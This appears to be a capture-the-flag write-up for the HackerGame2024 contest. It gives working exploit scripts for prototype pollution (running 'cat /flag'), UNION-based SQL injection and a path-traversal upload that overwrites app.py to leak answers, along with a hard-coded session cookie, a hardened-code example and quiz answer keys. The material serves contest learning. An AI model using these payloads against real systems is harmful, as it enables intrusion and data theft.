Turker
Published 2024-11-24 / 25 views

HackerGame2024 Writeup

Web

比大小 (Compare Sizes)

  1. Observed that the game hands out the entire state.values array right at the start
  2. And submission works by passing a string of greater-than / less-than signs to the submit function
  3. So the JS script is simply:
```javascript
submit(state.values.map(pair => pair[0] < pair[1] ? '<' : '>'));
```

Node.js is Web Scale

  1. Auditing the source reveals the vulnerable spot:
```javascript
app.post("/set", (req, res) => {
  const { key, value } = req.body;

  const keys = key.split(".");
  let current = store;

  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (!current[key]) {
      current[key] = {};   // vulnerable spot: keys are walked without any prototype check
    }
    current = current[key];
  }

  // Set the value at the last key
  current[keys[keys.length - 1]] = value;

  res.json({ message: "OK" });
});
```
  2. Using __proto__ as a key segment here walks onto Object.prototype and pollutes it
  3. Exploit code:
```python
import requests

base_url = "https://chal03-bx5x5egt.hack-challenge.lug.ustc.edu.cn:8443"

# "__proto__.flagcmd" makes the handler assign flagcmd on Object.prototype,
# so the store (and every other object) resolves it through the prototype chain
payload = {
    "key": "__proto__.flagcmd",
    "value": "cat /flag"
}
r = requests.post(f"{base_url}/set", json=payload)
print("Response:", r.text)

r = requests.get(f"{base_url}/execute?cmd=flagcmd")
print("Flag:", r.text)
```
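To make the root cause concrete, here is an added example (not the challenge's code) that puts the handler's key walk beside a hardened version that rejects prototype segments and only descends into own properties, with a helper that checks whether a write leaked onto Object.prototype:

```javascript
// Added example (not the challenge's code): the /set key walk as written in
// the challenge beside a hardened variant, plus a check for pollution.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Vulnerable: current[k] follows the prototype chain, so the segment
// "__proto__" steps onto Object.prototype and the last assignment
// becomes visible on every object in the process.
function setVulnerable(store, key, value) {
  const keys = key.split(".");
  let current = store;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (!current[k]) current[k] = {};
    current = current[k];
  }
  current[keys[keys.length - 1]] = value;
}

// Hardened: reject prototype-related segments, descend only into own
// plain-object properties, and create children with a null prototype.
function setHardened(store, key, value) {
  const keys = key.split(".");
  if (keys.some((k) => FORBIDDEN_KEYS.has(k))) {
    throw new Error("invalid key segment: " + key);
  }
  let current = store;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    const own = Object.prototype.hasOwnProperty.call(current, k);
    if (!own || typeof current[k] !== "object" || current[k] === null) {
      current[k] = Object.create(null);
    }
    current = current[k];
  }
  current[keys[keys.length - 1]] = value;
}

// Detection check: does an unrelated, freshly created object see `prop`
// after the write? True means Object.prototype was polluted.
function pollutes(setFn, key, value, prop) {
  const store = {};
  try {
    setFn(store, key, value);
  } catch (e) {
    return false; // hardened version refuses the key
  }
  const leaked = prop in {};
  delete Object.prototype[prop]; // undo any pollution so later checks are clean
  return leaked;
}
```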

PaoluGPT

  1. First crawl every link under */list*; that turns up the first flag
```python
import requests
from bs4 import BeautifulSoup
import re


def check_links_for_flag():
    base_url = "https://chal01-qtdi3xsf.hack-challenge.lug.ustc.edu.cn:8443"
    session = requests.Session()

    # Session cookie issued by the challenge platform for this account
    session.cookies[
        'session'] = "eyJ0b2tlbiI6IjE1NDA6TUVVQ0lCSEVXVXhrbnc3OGRTSHRTS0J5RjVPU25HR3Q0K3ZXNWFkZk5LWGlQbHhEQWlFQXZVTWFPMzdmZ0hjVUZNNjFXNGZDbkRmS0hCSXdXQ0VOL3pQaVdWNmY2K1k9In0.Zyz_Rg.dCrUq3qREmG2VearuQW1FUYMRZQ"

    list_page = session.get(f"{base_url}/list")
    soup = BeautifulSoup(list_page.text, 'html.parser')
    links = soup.find_all('a', href=True)

    print(f"找到 {len(links)} 个链接")

    # Visit every /view link and grep the response for a flag
    for link in links:
        href = link['href']
        if href.startswith('/view'):
            try:
                response = session.get(f"{base_url}{href}")
                if 'flag{' in response.text or 'FLAG{' in response.text:
                    print(f"\n在链接 {href} 中发现flag:")
                    flags = re.findall(r'flag{[^}]+}', response.text)
                    for flag in flags:
                        print(flag)
            except Exception as e:
                print(f"访问 {href} 时出错: {str(e)}")


if __name__ == "__main__":
    check_links_for_flag()
```
  2. Auditing the list route shows it only displays titles whose shown parameter is true
  3. The view route, meanwhile, has a SQL injection
  4. The second flag is in one of the hidden conversations
```python
import requests


def exploit_sql_injection():
    base_url = "https://chal01-qtdi3xsf.hack-challenge.lug.ustc.edu.cn:8443"
    session = requests.Session()

    # Session cookie issued by the challenge platform for this account
    session.cookies[
        'session'] = "eyJ0b2tlbiI6IjE1NDA6TUVVQ0lCSEVXVXhrbnc3OGRTSHRTS0J5RjVPU25HR3Q0K3ZXNWFkZk5LWGlQbHhEQWlFQXZVTWFPMzdmZ0hjVUZNNjFXNGZDbkRmS0hCSXdXQ0VOL3pQaVdWNmY2K1k9In0.Zyz_Rg.dCrUq3qREmG2VearuQW1FUYMRZQ"

    # conversation_id is concatenated into the query, so a UNION pulls in
    # the hidden (shown = false) rows as well
    payload = "' UNION ALL SELECT title, contents FROM messages WHERE title LIKE '%flag%' OR contents LIKE '%flag%' --"

    try:
        response = session.get(f"{base_url}/view?conversation_id={payload}")
        if 'flag' in response.text:
            print("flag内容:")
            print(response.text)
    except Exception as e:
        print(f"执行出错: {str(e)}")


if __name__ == "__main__":
    exploit_sql_injection()
```

禁止内卷 (No Involution)

  1. Because flask is started with flask run --reload --host 0, uploading a malicious app.py is enough to leak answer.json
  2. There is a directory-traversal vulnerability, so app.py can be written straight into the site directory; the request script:
```python
import requests

# Replacement app.py: once it lands in the site directory, --reload restarts
# the server with this file and exposes a /leak route
exploit_code = """
from flask import Flask
app = Flask(__name__)

@app.route('/leak')
def leak():
    try:
        with open('answers.json', 'r') as f:
            return f.read()
    except Exception as e:
        return str(e)

if __name__ == '__main__':
    app.run()"""

url = "https://chal02-hj5reaab.hack-challenge.lug.ustc.edu.cn:8443/submit"
files = {
    # traversal in the uploaded filename places the file outside the upload dir
    'file': ('../../tmp/web/app.py', exploit_code)
}

response = requests.post(url, files=files)
#print("Upload response:", response.text)

leak_url = "https://chal02-hj5reaab.hack-challenge.lug.ustc.edu.cn:8443/leak"
response = requests.get(leak_url)
print("Leak response:", response.text)
```

General

猫咪问答 (Cat Quiz)

  1. 3A204
  2. 2682
  3. 程序员的自我修养
  4. 336
  5. 6e90b6
  6. 1833

打不开的盒 (The Box That Won't Open)

  1. Open it in SOLIDWORKS and turn down the opacity

旅行照片4.0 (Travel Photos 4.0)

  1. Use Google well and the location can be identified directly
  2. 积水潭医院 (Jishuitan Hospital)